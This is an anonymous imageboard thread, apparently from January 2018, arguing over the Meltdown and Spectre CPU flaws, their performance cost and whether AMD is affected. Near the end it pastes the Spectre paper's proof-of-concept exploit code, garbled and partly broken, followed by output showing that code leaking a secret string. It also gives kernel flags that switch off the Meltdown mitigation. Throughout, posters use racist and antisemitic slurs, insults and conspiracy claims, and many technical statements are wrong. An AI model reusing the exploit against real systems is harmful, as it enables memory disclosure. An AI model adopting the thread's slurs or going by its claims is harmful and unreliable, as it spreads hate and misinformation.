FYI: The performance hits will be the worst on programs that do a lot of syscalls and nothing else, like networked programs and shit that needs IO. CPU intensive tasks have no difference.

Is it worth moving from hardened sources?
Would there be a grsec kernel with KASLR that is freely available any more?
Is there another way to migitate the flaw using hardened?

It seems like literally only server software that needs to abstract kernel memory and access it from usermode for security reasons is affected. That's why Google and Amazon are shitting themselves

For everyone else though, there is absolutely no performance penalty whatsoever and its just business as usual

Page Table Isolation is already rolled out to the latest kernels to mitigate it AFAIK. Obviously this comes with the aforementioned performance penalty, but this can be solved with better optimization of how kernel and userspace are abstracted and is really a quick and dirty fix for now

Incidentally, Macfags will likely never notice a difference since OSX already uses PTI

That's the joke.

I'm not using the latest one. I'm using the latest freely released grsec kernel that is no longer supported.
I still like all of the security features to be kept so that why I'm not really upgrading.

this kernel patch is going to get shoved down your throat weather your like it or not. the only way to avoid it is to never update your kernel ever again.

Or compile your own kernel with it disabled since only distro maintainers will be blackmailed/coerced by (((them))) to enable the botnet or disable it by default. It still won't save you if you use x86 though.

Javascript can be used to achieve arbitrary code execution if there is an vulnerability in the web browser. Once this has been reached the x86 vulnerability could be exploited.

WE

WUZ
been waiting for someone to call that out

Meds aren't black though?

See

The only applications that are impacted are PCI based storage and database programs

Video games, web browsers, and fucking hell, productivity applications like video editors and Photoshop, will have no performance impact. Stop being a cocksucking fanboy for 2 seconds. The major of users aren't going to see a difference

Oh the majority of people will see a difference in their backend performance, and this is a major screw-up for a hardware vendor.

OMG GONAD GLOMPF BTFO HOW WILL HE EVER RECOVER

No they will not because the majority of programs the average user interacts with are run completely in userspace and do not need to access kernel mode memory a million times a day like database programs. This is why gaming benchmarks are seeing 0 percent performance impact. The only people who should care are server admins. That's why Google and Amazon are shitting themselves right now.

Of course throwing all logic and reason out the window to be a mouth-breathing fanboy is far easier than using your brain so I'm not surprised

Just what do you think I meant by backend performance? The online services people use will run slower and/or pass their costs down, or maybe be idiotic and just run it insecurely. It's gonna matter, and it'll probably hurt Intel (which I'm fine with).

The whole internet isn't going to slow down as a result either though, retard, Amazon and Jewgle won't let that happen. They'll probably all switch to Threadripper servers before they let that happen. Overall its likely they'll come up with a better workaround, it's likely this can be fixed with better optimization with privileged memory access
Overall the only party here's getting hurt is Intel, which I couldn't care less about, as long as muh gaems run fine and I don't feel like I completely wasted my money on my Skylake, next processor will certainly be Ryzen though

I have no idea about Amazon but Google do mix architectures to avoid this, they've got a lot of POWER running around.

I'm hardly preaching the apocalypse over this. But it's not some trivial issue either, I for one am pretty pissed off that this sort of flaw exists when they should know better.

enjoy seeing pozfox slow down to a crawl as it makes 500 system calls saving all of the web5.0 frameworks files, and the browsers built-in indexeddb, and all the telemetry and history, all over the harddrive. dont forget all the io that windows 10 generates with it's botnet.

There's little reason any browser should be making any calls to kernel mode memory. Modern web browsers in fact tend to sandbox tabs and applets for security reasons. If your web browser requires direct kernel memory access you shouldn't be using that browser today begin with

muh WebGL tho

Repeating your Intel fanboy paroles will not make them true. Kill yourself you fucking moron. No user space program accesses kernel memory holy shit how retarded are you. This will slow down *everything* that needs syscalls, the more it needs / time the larger the slowdown, how about shut your idiot mouth you worthless piece of shit.

Why the fuck are usermode programs seeing 0 percent performance impact with PTI enabled then?
This isn't fanboyism, it's fucking reality, and people like you are salty for no fucking reason other than the fact you have no cannon fodder to feed your shitstorm on anonymous imageboards you condescending twat

This isn't about syscalls, this is about usermode programs needing to access kernel mode memory. Video games and web browsers do not need to access memory in kernel mode and api calls they require are likely exposed in usermode memory.
The biggest impacts are web databases that need to run in usermode to serve data for security reason while also needing to access kernel mode memory millions of times a day. This will also impact PCI mode SSDs because filesystems are typically run in kernel space

We are all adults here user please act like one

GL web apps, much like video games, call the usermode GPU drivers. Again, hence why video games are not impacted on Linux. Not sure how Windows is going to deal with this since kernel and user mode abstraction is all over the fucking place on Windows but the upcoming patch will likely deal with it

Because it doesn't have any?

Well this probably wont impact performance on WINE either since I don't think the WINE devs would be retarded enough to allow Windows applications to directly access kernel memory to begin with

Nigger.

phoronix.com/scan.php?page=news_item&px=x86-PTI-EPYC-Linux-4.15-Test

apparently "20year lurker" man is vindicated somewhat

Because some programs do no/very few syscalls.

Seriously man lurk 2 years at minimum

Holla Forumsjeet detected

NO USERSPACE PROGRAMS ACCESS KERNEL MEMORY, THAT IS THE POINT OF THE SEPARATION

This isn't about syscalls necessarily, this is about usermode programs needing to access kernel mode memory. If an application runs entirely in usermode, or entirely in kernel mode, it is not effected. If a kernel mode program needs to access usermode, it is not effected, but if a usermode application needs to access kernel mode, it is effected. The overhead is because usermode applications now need gated access to kernel memory and kernel memory is no longer freely exposed to usermode programs

Android is Linux with even more evil inside.

Wrong. Kernel space is typically exposed to user space via virtual memory for performance reasons. Its the kernels job to manage what data can be read freely. The Intel CPU bug allows all memory that would normally be unreadable to be exposed to usermode applications, hense why page table isolation is now necessary.

It is not exposed, it just shares the same namespace and is hidden, just not effectively on Intel cpus as it turns out.

Its the kernels job to manage what data can be read freely. The Intel CPU bug allows all memory that would normally be unreadable to be exposed to usermode applications, hense why page table isolation is now necessary.
Not all of it, other user space processes are in their own namespace, so you can not get information about those even with the bug.

I am regretting this purchase less and less every day.

IHBT

Something that doesn't respect your freedoms?

speaking of not respecting freedoms, i wonder how many syscalls steam for linux makes with VAC. steam probably wasn't included in that benchmark

If jewgle etc. adopt threadripper where will I get my hands on the stuff they're dumping?
Do I hang around the dumpster out back or something?

DEAL WITH IT

airline passenger from Singapore with a new flu could wipe out Europe
(they should fly to Washington instead).
Sick. Not as sick as FUCKWIT but still pretty hot.

How did AMD get away with this?

Are there even any coreboot compatible AM3 mobos?

Shredding machine. Everything gets "recycled" because global jewrming/muh eco/whatever.

I wonder who use it as a host system as their most advanced vm system is chroot.
Next time they and loonix devs should hide userspace from users for even greater security. :^)

There wasn't any rush. This randomization has been in the works for several releases. In fact, over a year ago someone on misc was asking about running OpenBSD with disk mounted read-only, and one of the developers (or maybe even Theo) said that was no longer supported because now libraries get randomized on every boot. Doing the same with kernel was just the next logical step.

Will PS4/Xboner have the same issue since they're x86 based? Could this lead to finally getting them cracked open?

ayymd not affected. I wonder if intel will delay their new chips due to this

Yes, search the coreboot wiki nigger.

AMIGA FOREVER
PC BTFO

Yup.

Shills will defend this and cover it up and say nothing is going on. Remember that.

Close inspection of kernel patches reveal code that forces machines running all x86 processors, Intel or AMD, to be patched, regardless of the fact that AMD processors are immune. Older commits to the Linux kernel git, which should feature the line "if (c->x86_vendor != X86_VENDOR_AMD)" (condition that the processor should be flagged "X86_BUG_CPU_INSECURE" only if it's not an AMD processor), have been replaced with the line "/* Assume for now that ALL x86 CPUs are insecure */" with no further accepted commits in the past 10 days. This shows that AMD's requests are being turned down by Kernel developers.

archive.is/kFte4

No surprises here. Every tech expert and their dogs knows that with intel you lose.
Amazing that big corps like amazon and google that have a lot of money to lose don't know this.
Trusting intel is just as bad as trusting microsoft.

but the tech expert linus tech tips told me intel has more "platform stability" :(

he is the most trusted source of unbiased tech related information, everything from obscure operating systems like linux and *bsds, to nerf guns. weird how he got that one wrong

8-bit represent!

Amazing.
Just how many fucking shekels are Intel paying Linus (torvalds, not tech tips. honestly, what's the difference anymore?) to make their horrible processors look good? I really am beginning to realize that Linux is really just as untrustworthy and shady as Windows. Fuck this gay earth.

I wouldnt go that far but this case is pretty shady indeed.

They have been. Look at all the "muh kernel memory access" droolposting above from someone paid to not understand what a fucking syscall is.

Fun fact: every time an extension icon redraws in chrome/chromium it writes the image to a berkdb database on disk and forces a sync (inotifywatch $profiledir/Extension\ State if you don't believe me). Imagine how many other retarded things your entire desktop must be doing 50 times a minute.

Breathe deeply, Herschel.

Easiest PowerPC to get ahold of: G3 and G4 PowerBooks and iBooks. Get them with nice shattered screens. They'll be comparable to or a little slower than an Intel Pentium 4. You should be able to find them for next to nothing online.
Shattered screen is best because you can take the thing off, throw it away, and plug in a VGA monitor and have a 'slab' computer with built in keyboard and mouse. You just need to add an OpenFirmware script which re-aliases screen from Stone_A to Stone_B so that the Linux kernel will display on the correct output device (VGA monitor rather than shattered LCD screen).

Dunno. Why do you? I remember some early AMD Phenoms being hit with a similarly costly kernel workaround for a bug in the MMU HW. It wouldn't even be the first time.

I was considering this too. The problem is that the source code for the "openfirmware" BIOS has been shoahed off the internet. The oldest archive of it is two years old. That is alot of time to fuck up or botnet the firmware of the physical powerbooks. Unless someone has a backup of it there's no real reason to go down this path since you still have similar shiitty problems using openbsd on it as on x86 because of known BIOS/openfirmware bugs/trojans. the screens are really easy to fix though if you know what you are doing you could even upgrade/replace the screen if you go and upgrade the on board GPU at the same time using something like a newer AGP card or a self-made AGP to pci-e mini converter

No Mandatory Access Control. How could it be taken seriously?!!
Also no bootable encrypted root with OpenBSD. Crypto and ZFS are theoretically possible with ppc32 grub2. Therefore Hardened Gentoo GNU/SELinux wins.

Were you born retarded? You don't need grub when you can modify the firmware you giant faggot. That's why I was talking about the source code for the openfirmware project so that support for encrypted drives could be added in forth instead of the insane systemdicks mess that grub2 is. That and fixing firmware bugs. But it was shoahed off the internet you stupid fuck.

Watching all the shill arguments about how this isn't a big deal is really eye opening. If Nvidia or AMD sold you a graphic card, and then went
you'd be pissed off if Nvidia or AMD got online and went

People bought these Intel CPUs after looking at benchmarks and expecting a certain level of performance. Now now, we're seeing worst case scenarios where post-patch the Intel CPU is running half as fast as it used to.

Anyone who tells you a product that isn't what you thought it was isn't a big deal is not your friend. They are lying and full of shit. All these fucking tech sites

someone needs to file a class action lawsuit against intel for false advertising. They knew about this but didn't want to disclose it because it would hurt sales. Fucking kike CEO even dumped his stocks early in december.

OpenBSD has encrypted /root, the install docs page has a whole segment on it. In fact, OpenBSD has a full encrypted disk, i.e. /boot and /root.

You're just a retard.

... until you find out ofwboot doesn't support reading that FDE.
You're just a retard calling others retard.

You mean github.com/openbios ?

word on the street is it will be unembargoed (soon)

Holy fuck. Shit's serious.

You learn to do that over time when working in a large corpo.

That's the sparc version and possibly a botnet. We need the powerpc version for powerbook macs. It used to be located here archive.fo/GEbMu but here is the shoahed version archive.fo/vlWP3 . Anyone have a backup?

You are a even larger colossal retard. If you have the source code to the "openfirmware" on macbooks you can just program it to read FDE instead of adding the bloat that would be grub2.

Why is AMD not taking advantage of this to push Epyc?

If I turn off virtualization features in my bios, am I unaffected? This should mostly impact public clouds right?

They don't need to. These fixes for Intel are completely clobbering Intel disk performance. Which means all those giant websites with massive databases are going to get fucked.

Imagine you run something like Facebook or Twitter and when you get his new updated kernel, you lose 50% of your database performance when database has to go to disk.

Intel is currently trying to bribe Microsoft and Linux to making sure this patch applies to all x86 CPUs, including the AMDs that this doesn't affect. I assume AMD is staying quiet, for now, because no one really knows if the patch to fix Intel is going to also apply to AMD.

Nope, this affects everything, and the "fix" that destroys performance is coming to your kernel very soon, unless you compile your own. Shills are just trying to write this off as something that only affects database and virtualization. It affects those more than anything, but performance is going to tank over a lot more than that, and it's going to make a lot of things massively insecure.

The paid off tech sites are already starting to write this off as just a datacenter issue and then wagging 3 gaming benchmarks in front of people's face so they can go

I thought AMD was not affected by this? This is a Intel hardware bug.

All high-performance CPU manufacturers cut corners. This is literally necessary for extracting decent IPC from real-world programs. The question is which corners get cut, and how the implications of cutting them were handled/mitigated. Sometimes the mitigations turn out to be buggy/incomplete. That's the risk you take every time you do hacky stuff.
By the way, this is not limited to hardware. Performance hacks in software also come with a decent risk of unforeseen consequences. Sometimes they blow up right in your face, and fixing those blowing corner cases is not trivial. Oh well.

It is, and they are trying to make sure the fix is applied to AMD so AMD CPUs are slowed down too. They are also trying to be as ambiguous as possible by saying shit like

Intel knows that if its performance is going downhill, they will try and take AMD's with it too. They are joust like Nvidia, if they have to change software to make their product slower, they'll do everything they can to make sure it negatively affects their competitors more.

This doesn't affect AMD CPUs. So you are saying AMD cuts fewer corners? Also, why is Intel cutting corners in a situation that could affect security so massively? I can understand 5.0 + 5.0 = 10.0000001, but this is on a different level.

Linux is patched for all x86 CPU, not only Intel. AMD has stated this does not affect their CPU, and has also written a patch to detect whether to apply the fix or not based on vendor, but it is unknown if it will be merged on 4.15 or 4.16. For all we know, x86 performance may be affected for all CPU for a month, but it should be fixed at least by 4.16.

Intel really is a pit of jew snakes.

This fix is getting backported to earlier kernels. You think AMD's patch is going to affect all those other LTS kernels and such? The fact that you're going to have to patch your kernel if you're on AMD, because of an Intel bug, really shows how much control Intel has over the x86 ecosystem.

Here is Intel's official response.
newsroom.intel.com/news/intel-responds-to-security-research-findings/

Predictable.

Even the cucks at hacker news aren't buying it.

Let's not forget this gem right here. Those 300M$ sure are paying their dividends off.

They are now forgiven after they introduced actual 8-cores at consumer price points.

Does anyone know which config option does the patch refer to in the new kernel?

zdnet.com/article/security-flaws-affect-every-intel-chip-since-1995-arm-processors-vulnerable/

Important Links
meltdownattack.com/
spectreattack.com/

No, I'm saying they chose to cut different corners.
You don't know what it could affect beforehand. Hacks tend to have unpredictable consequences.

You did get 8 integer cores with the bulldozer family, so they weren't lying completely
They also publicised the halving of FPUs at the time so there's nothing to forgive really, people should just have RTFM before purchasing something that didn't satisfy their needs

this is weak damage control

I can feel the collective piledriver smug in here. Feels pretty good.

I would love it if AMD could speed up the launch of their next Ryzen chips to take advantage of this.

Everything Went Live
Attacks
meltdownattack.com
spectreattack.com/
Papers
meltdownattack.com/meltdown.pdf
spectreattack.com/spectre.pdf
Project Zero Write up
googleprojectzero.blogspot.co.at/2018/01/reading-privileged-memory-with-side.html

FX CPUs get shit on by the mustard race, but it's not a bad CPU for the price. Even if the '8 cores' thing was always bullshit.

The only reason that I would buy amd is when they'll release the hardware source.

nice man me too, what CPU are you using now? I have a core i5 :^)

That's "there are no tanks in bahgdad" levels of bullshit. The Linux patches specifically indicate AMD doesn't need the workarounds and 'there is no significant penalty yet it will be migtated over time' is some lol. How's that $300M of diversity, doing, Intel?

Your post is worthless if you aren't making it from a Commodore 64 my friend.

P4

meant for

Nice man I'll switch from Intel to AMD once AMD open sources all their hardware too. Until then I'll stay on Intel :^)

AMD is still vulnerable. Note how that line is no longer in Linus' tree.
git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/cpu/common.c#n927

That comment just says they are going to assume all x86 CPUs are affected, not that AMD (and Via) are affected. Kind of funny how Via gets excluded from all of this, it's almost like Intel is just trying to drag their main competition into this and they're not actually worried about all x86 CPUs.

from the website for the attack

Not really. It's 8 ALUs and 4 FPUs, so it depends on your workflow x264 really like those CPUs.

Only spectre. If you read the rest of the page, Spectre isn't the one that is requiring kernel patching, only Meltdown does. Spectre looks like it'll be a compiler fix with some patching to existing software. Meltdown is the one that needs kernel patches, and so far it's only confirmed to work on Intel.

Via has been out of the game for how long now?

The patch is for Meltdown, good try Jewtel.

Looks like there is at least one more vulnerability being announced: xenbits.xen.org/xsa/
It is scheduled to be uncovered in 13 hours from now.

TAKES ONE TO KNOW ONE!

I believe they are now planning to reenter it, in partnership with some chink semiconductor company.

Their embedded market is doing very well, and now they are teaming up with the Chinese Zhaoxin ZX to make high performance x86 CPUs. They are claiming they want to hit Ryzen levels of performance in two or three years.

Yup. It might actually provide decent competition to Intel and AMD. But it'll probably be another three or five years before they get there, and even then do you really want communist botnet?

The Project Zero post is really interesting for any anons who want to know more about the vulnerability. Just saying.

Source?

From spectreattack.com/#faq-why-spectre
>The name is based on the root cause, speculative execution. As it is not easy to fix, it will haunt us for quite some time.

I actually have a Via nano equipped thin client. Doesn't look that bad compared to Geode or Atom.

Why is this video so fucked up?

How is it fucked up?

It's not a bug, it's a feature!

Anyone?

Especially now that atom's performance will be cut :D It's really unfortunate that VIA mobos aren't as available as atomshit. It would make a good replacement for old desktops.

I don't but starting the kernel with -nopti flag will give you back the performance afaik.

If the latest insider preview have the patch, then the ms did a good job, as the performance closely the same, only the io became a bit slower.

pti=off

out

pic

Not a arguement.

You're kidding, right?
Why wouldn't I have the option to disable it?

glow in the darks and kikes have known about this for some time.

So this what Intel meant when they suggested AMD was affected, too? That if you enable an option disabled for security reasons then AMD has the same problem? lol.

Read the paper, I'm not here to spoonfeed you. TLDR is Spectre abuses the branch predictor to get one application to read an application's memory it's not supposed to. Meltdown abuses the kernel and lets you read kernel memory.

Spectre is a pain to fix because it abuses the branch predictor, and branch predictors are used in tons of CPUs.

Meltdown breaks down the wall that separates userspace and kernelspace. They are both very bad and difficult to fix, but for completely different reasons.

Is this the result of Intel's $300 million in diversity? Hiring pajeets to do damage control on Holla Forums?

Remember, the elite want to build a techno-tyranny on this hardware. NWO BTFO.

why isn't AMD capitalizing on this?
remember AMD has a huge contract to replace intel's integrated gpu's with theirs, and has the same botnet in the form of PSP. Two monopolies might as well be one monopoly and the choice is an illusion.

Why didn't you listen?

LURK MOAR. If you had lurked moar you would know everything is a fucking botnet.

access.redhat.com/security/vulnerabilities/speculativeexecution

(((illusion)))

Look at the names of the security researchers and I think you'll find 'kikes' were responsible for finding and reporting this bug. Of course, you are a retarded Holla Forumsnigger so you don't care about the technology but just want to have a seizure because you found the word Rothschild somewhere. Fuck off.

I asked for a source. You could have just said 'the paper' (though there are two).

None of what you said actually supports the view that fixing Spectre will just be 'a compiler fix' (if that's what you're replying about). Are you sure you're not confusing branch prediction in the optimisation done by compilers with branch prediction done by the CPUs themselves?

Damn you're right, I'm sure glad people actually did waste their hard earned money over a retarded companies mistake and all hope for workaround is lost. Praise AMD! Inshallah brother!

gas yourself kike your people were responsible for creating this 'bug' in the first place.

Sage negated, bigot.

computerbase.de/2018-01/intel-cpu-pti-sicherheitsluecke/

nothing was even saged rustfag

Sorry someone from /r/sysadmin crosslinked here just sayin' hai :p

Reminder that google is NSA funded.

Lurk two years.

Is there any poc? The iaik repo haven't released it yet.

Go back, no leet haxoring shit here for you.

All glitchy 'n shiet. Now I'm paranoid it was malware.

So either NSA fucking Kiketel alongside with poor goyims was a part of a much bigger plan, or suddenly everyone fucked everyone. Jesus Christ, what a time to be alive.

Based.

I threw it together quickly without caring about sync

AMDfag here, ran the code from Listing 4 in Spectre paper. T-that's bad, isn't it? I ran it on an old ThinkPad R60 too and it only died with SIGILL...

go away nazi son of a bitch

There's moar to come
xenbits.xen.org/xsa/
INTEL IN FLAMES TOMORROW.

Shut it down! The goyim knows!

FUCKING WEW

There was at least one at the end of one of the papers.

SOMEONE TRY IT ON OLD "NEW WORLD" APPLE POWERPC HARDWARE!

i looked to see and discovered this. this is exactly what's going to happen.

That or
en.wikipedia.org/wiki/MIPS_architecture
Reminder that RMS was a mips user.

Yes videos and images can be botnets if they abuse a bug in the rendering or parsing of said audio or video. Generally for the most security you want to use a up to date VLC and up to date libraries for watching videos via something like streamlink or youtube-dl. But there's still no garuntee that someone did not find a unpatched bug in the library used to render the endcoded format. Or in the case of (((WEBM))) by jewgle a intentional backdoor. But I think jewgle is saving the intentional backdoors for something like TANGO.

Just think about, a bug that everyone catches just because they opened a single image for a fraction of a second. But it is so much worse then that.

I can't wait for the brainlet meme to die.

This website has gone to shit. /g/ and Holla Forumsaks have taken over.

luckily there's the whole rest of the internet for you to go back to

By that I mean this thread have been derailed by these fucktards.

My ass.
GTFO REEEEEEE

Based Holla Forumsack telling it like it is.
It's an official happening thread now get with the times

The only ones I see derailing are the ones not calling (((them))) out.

But it's still botnet because you can still exploit the bug even without the fix.

t.butthurted, cucked kike lover

I mean to say even with the fix

It means intel needs to reserve 35% of your CPU's computing power for its botnet now, just shut up and click apply.

Released

meltdownattack.com

RIP Intel.

Go back to r/donald.
Donald is a Zionist kike lover and so are you.

intel should've checked its privilege

Is there a released list of what's been hit? Obviously saying "literally everything has been hit" is not at all helpful because that means some stuff hasn't. Just want to find a list of affected chips

This

Every superscalar Intel CPU. Every single one.
atom might be safe

They did and it cost them 300 million dollars. I guess Anita was not thorough enough ramming Intel up the backside with her SocJus poison.

I am running PPC. Where is the code?

Every x86 CPU with a MMU. Did you not read the thread?

See above

Quickly googling about spectre specifically has turned up results saying AMD and ARM processors are affected as well. I assume everyone has been pretty much raped?

github.com/xoreaxeaxeax/sandsifter

All processors are vulnerable to sidechannel timing attacks to some degree. But we already know that, it's why we use chacha20/ed25519 and nothing else. You are using safe crypto, user?
The Intel thing is far worse though, because it lets ring 3 read from ring 0. Or ring -3.

Post the code you nigger.

If it lets write then we can disable the ring-3 backdoors ;)

Replace Your Exploit-Ridden Firmware with Linux - Ronald Minnich, Google
youtube.com/watch?v=iffTJ1vPCSo
Disabling Intel Management Engine w/System76
youtube.com/watch?v=MujjuTWpQJk

But it's in hardware, you can't disable that.
that was a rhetorical question wasn't it?

Is TempleOS safe from Jewtel?

word from Linus

Any way to find out how the patch affects performance? Are there any benchmarks being released for chipsets?

x86intrin.h: No such file or directory

All post 2006/8 intel CPU has the ME physically embedded in the CPU it cannot be disabled definitively.

I N T E L B T F O

That is for x86. And it wants me to run it as root. Nope.

I've read on different places that Intel's sold his shares? I don't have a source on this, but would be hilarious if true.

Yes the CEO sold half of his shares in December. Don't worry though it had nothing to do with this.

Yeah, nothing to worry about. Nothing at all like the Equifax executives who did the same thing.

But the methods were reported to the manufacturers and cloud operators in July. So maybe it reached the top only recently? I mean it doesn't really make sense to sell the shares of the company you are leading imho.

I'd post some smug anime girl if I wasn't on tor.

ME can be toggled so long as it's not a hypermodern Intel CPU; I think the cutoff is Haswell or Skylake. However the process is a lot of dicking around for a "feature" that should not be there in the first place.

Ya and he was replying directly to Andi Kleen

So, for pragmatic purposes, the 'meltdown' bug is mediated by page table isolation update mostly hurts IO on Intel CPUs, potentially hurting server providers immensly, and leaves systems that do not receive kernel updates vulnerable to attacks reading kernel memory.
The 'spectre' one seems a lot worse, since many more architectures are vulnerable, most importantly ARM, although the authors have written patches.
Am I correct in assuming shit is about to go down since billions of old android devices from smartphones to smart toasters won't receive any security updates?

Destroy your net connection and all will be fine ;)

The NWO techno control grid is nothing more than a paper tiger.

Mono-cultures are bad, one disease and everything dies.

Time to get a 486 mobo and start assembling the computer

I'd advise you not to trust any CPU with the ME hardware, even if it's the "super NSA switch!!1!".

It can but we don't have long term data on if it's going to say like that it might power on again because LMAO the bios/uefi battery died and needed to be replaced or other unpredictable shit.
That's why system76 and similar who are selling MEcleaned hardware are lying the ME is still there and there's no guaranty except for old thinkpad hardware were the ME can totally be removed.

True

RMS was right all along.

/var/log/packages/gcc-7.2.0-i586-1:usr/lib/gcc/i586-slackware-linux/7.2.0/include/x86intrin.h
/var/log/packages/llvm-5.0.1-i586-1:usr/lib/clang/5.0.1/include/x86intrin.h

Depends on the level of trust you are going for. But otherwise this is true.

I'm not a "muh russia" retard. I am completely serious, chacha20 will not keep you safe.

Sample code using Spectre dumped from the PDF (but it's a formatting mess):
#include #include #include #ifdef _MSC_VER#include /* for rdtscp and clflush */#pragma optimize("gt",on)#else#include /* for rdtscp and clflush */#endif/********************************************************************Victim code.********************************************************************/unsigned int array1_size = 16;uint8_t unused1[64];uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };uint8_t unused2[64];uint8_t array2[256 * 512];char *secret = "The Magic Words are Squeamish Ossifrage.";uint8_t temp = 0;/* Used so compiler won’t optimize out victim_function() */void victim_function(size_t x) {if (x < array1_size) {temp &= array2[array1[x] * 512];}}/********************************************************************Analysis code********************************************************************/#define CACHE_HIT_THRESHOLD (80)/* assume cache hit if time 0; tries--) {/* Flush array2[256*(0..255)] from cache */for (i = 0; i < 256; i++)_mm_clflush(&array2[i * 512]);/* intrinsic for clflush instruction *//* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */training_x = tries % array1_size;for (j = 29; j >= 0; j--) {_mm_clflush(&array1_size);for (volatile int z = 0; z < 100; z++) {}/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 *//* Avoid jumps in case those tip off the branch predictor */x = ((j % 6) - 1) & ~0xFFFF;/* Set x=FFF.FF0000 if j%6==0, else x=0 */x = (x | (x >> 16));/* Set x=-1 if j&6=0, else x=0 */x = training_x ^ (x & (malicious_x ^ training_x));/* Call the victim! */victim_function(x);}/* Time reads. Order is lightly mixed up to prevent stride prediction */for (i = 0; i < 256; i++) {mix_i = ((i * 167) + 13) & 255;addr = &array2[mix_i * 512];time1 = __rdtscp(&junk);/* READ TIMER */junk = *addr;/* MEMORY ACCESS TO TIME */time2 = __rdtscp(&junk) - time1;/* READ TIMER & COMPUTE ELAPSED TIME */if (time2 = results[j]) {k = j;j = i;} else if (k < 0 || results[i] >= results[k]) {k = i;}}if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))break;/* Clear success if best is > 2*runner-up + 5 or 2/0) */}results[0] ^= junk; /* use junk so code above won’t get optimized out*/value[0] = (uint8_t)j;score[0] = results[j];value[1] = (uint8_t)k;score[1] = results[k];}int main(int argc, const char **argv) {size_t malicious_x=(size_t)(secret-(char*)array1);/* default for malicious_x */int i, score[2], len=40;uint8_t value[2];for (i = 0; i < sizeof(array2); i++)array2[i] = 1;/* write to array2 so in RAM not copy-on-write zero pages */if (argc == 3) {sscanf(argv[1], "%p", (void**)(&malicious_x));malicious_x -= (size_t)array1;/* Convert input value into a pointer */sscanf(argv[2], "%d", &len);}printf("Reading %d bytes:\n", len);while (--len >= 0) {printf("Reading at malicious_x = %p... ", (void*)malicious_x);readMemoryByte(malicious_x++, value, score);printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));printf("0x%02X=’%c’ score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);if (score[1] > 0)printf("(second best: 0x%02X score=%d)", value[1], score[1]);printf("\n");}return (0);}

destroy wifi ic, network ic, cut cables, shield device, no net, no botnet.

Define "shielded"

Why would those retards do this? Now every script kiddy and their mother can abuse this with ease.

go to place with faraday shielding/enclose computer in metal cage, or box

So this would be a laptop form factor and running off of battery? In such a case yea, it is not a botnet depending on how you did some other things. But if you mean a stationary power supplied desktop, then its a fucking botnet still.

Ya I dont think this will run on PPC.
x86intrin.h needs ia32intrin.h and other x86 shit.

To me in the case of Meltdown, it seems Intel made a mistake due to gross negligence going back for years (if not decades). Think of how many legacy systems are open books right now with their ass exposed on the net for the whole world to hit up and no hope for a patch. This is potentially up there with the mid-90s math bug.

Oh, I'm not saying I do. Far from it in fact. The fact that the ME is horrifically insecure (by mistake AND design), and this new problem, are indications that you shouldn't be on an Intel processor at all for the foreseeable (read: 5-10 years plus if ever) future.

It's worse as it affects all x86 systems with a MMU.

//Reading 40 bytes:Illegal instruction//
Am I safe from specter?

All good* torposters use web proxies to not stand out like faggots.
Check out proxies on /test/ because most block image uploads.
4everproxy.com/ kproxy.com/
These two work well.
t. military-grade autist torfag
never use javascript
* there are no good torposters

Same thing on my machine. Looks like that header provides rdtscp and clflush, which don't seem to exist on PowerPC. Further down the rabbit hole it wants mm3dnow.h and rdseedintrin.h among others. This code will never run on PowerPC.

P6 (pentium pro) was the first intel cpu to get speculative execution ( so no spectre before p6 ) and meltdown is mitigated by software

Hard to tell, I had the same happen on ThinkPad R60

It's not mitigated, it is delayed. Theres more then one way to abuse it. Lurk more.

I think it has something to do with reading too much of some type of memory/cache or something.
x200 user here.

from my x230:
Linux devuan-x230 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64 GNU/Linux
Reading 40 bytes:Reading at malicious_x = 0xffffffffffdfed68... Success: 0x54=’T’ score=2 Reading at malicious_x = 0xffffffffffdfed69... Success: 0x68=’h’ score=7 (second best: 0x05 score=1)Reading at malicious_x = 0xffffffffffdfed6a... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed6b... Success: 0x20=’ ’ score=17 (second best: 0x00 score=4)Reading at malicious_x = 0xffffffffffdfed6c... Success: 0x4D=’M’ score=2 Reading at malicious_x = 0xffffffffffdfed6d... Success: 0x61=’a’ score=15 (second best: 0x00 score=7)Reading at malicious_x = 0xffffffffffdfed6e... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffffffffffdfed6f... Success: 0x69=’i’ score=11 (second best: 0x00 score=1)Reading at malicious_x = 0xffffffffffdfed70... Success: 0x63=’c’ score=15 (second best: 0x00 score=7)Reading at malicious_x = 0xffffffffffdfed71... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed72... Success: 0x57=’W’ score=13 (second best: 0x00 score=6)Reading at malicious_x = 0xffffffffffdfed73... Success: 0x6F=’o’ score=2 Reading at malicious_x = 0xffffffffffdfed74... Success: 0x72=’r’ score=15 (second best: 0x00 score=7)Reading at malicious_x = 0xffffffffffdfed75... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfed76... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed77... Success: 0x20=’ ’ score=15 (second best: 0x00 score=7)Reading at malicious_x = 0xffffffffffdfed78... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed79... Success: 0x72=’r’ score=13 (second best: 0x00 score=6)Reading at malicious_x = 0xffffffffffdfed7a... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed7b... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed7c... Success: 0x53=’S’ score=2 Reading at malicious_x = 0xffffffffffdfed7d... Success: 0x71=’q’ score=2 Reading at malicious_x = 0xffffffffffdfed7e... Success: 0x75=’u’ score=7 (second best: 0x05 score=1)Reading at malicious_x = 0xffffffffffdfed7f... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed80... Success: 0x61=’a’ score=15 (second best: 0x00 score=7)Reading at malicious_x = 0xffffffffffdfed81... Success: 0x6D=’m’ score=7 (second best: 0x05 score=1)Reading at malicious_x = 0xffffffffffdfed82... Success: 0x69=’i’ score=2 Reading at malicious_x = 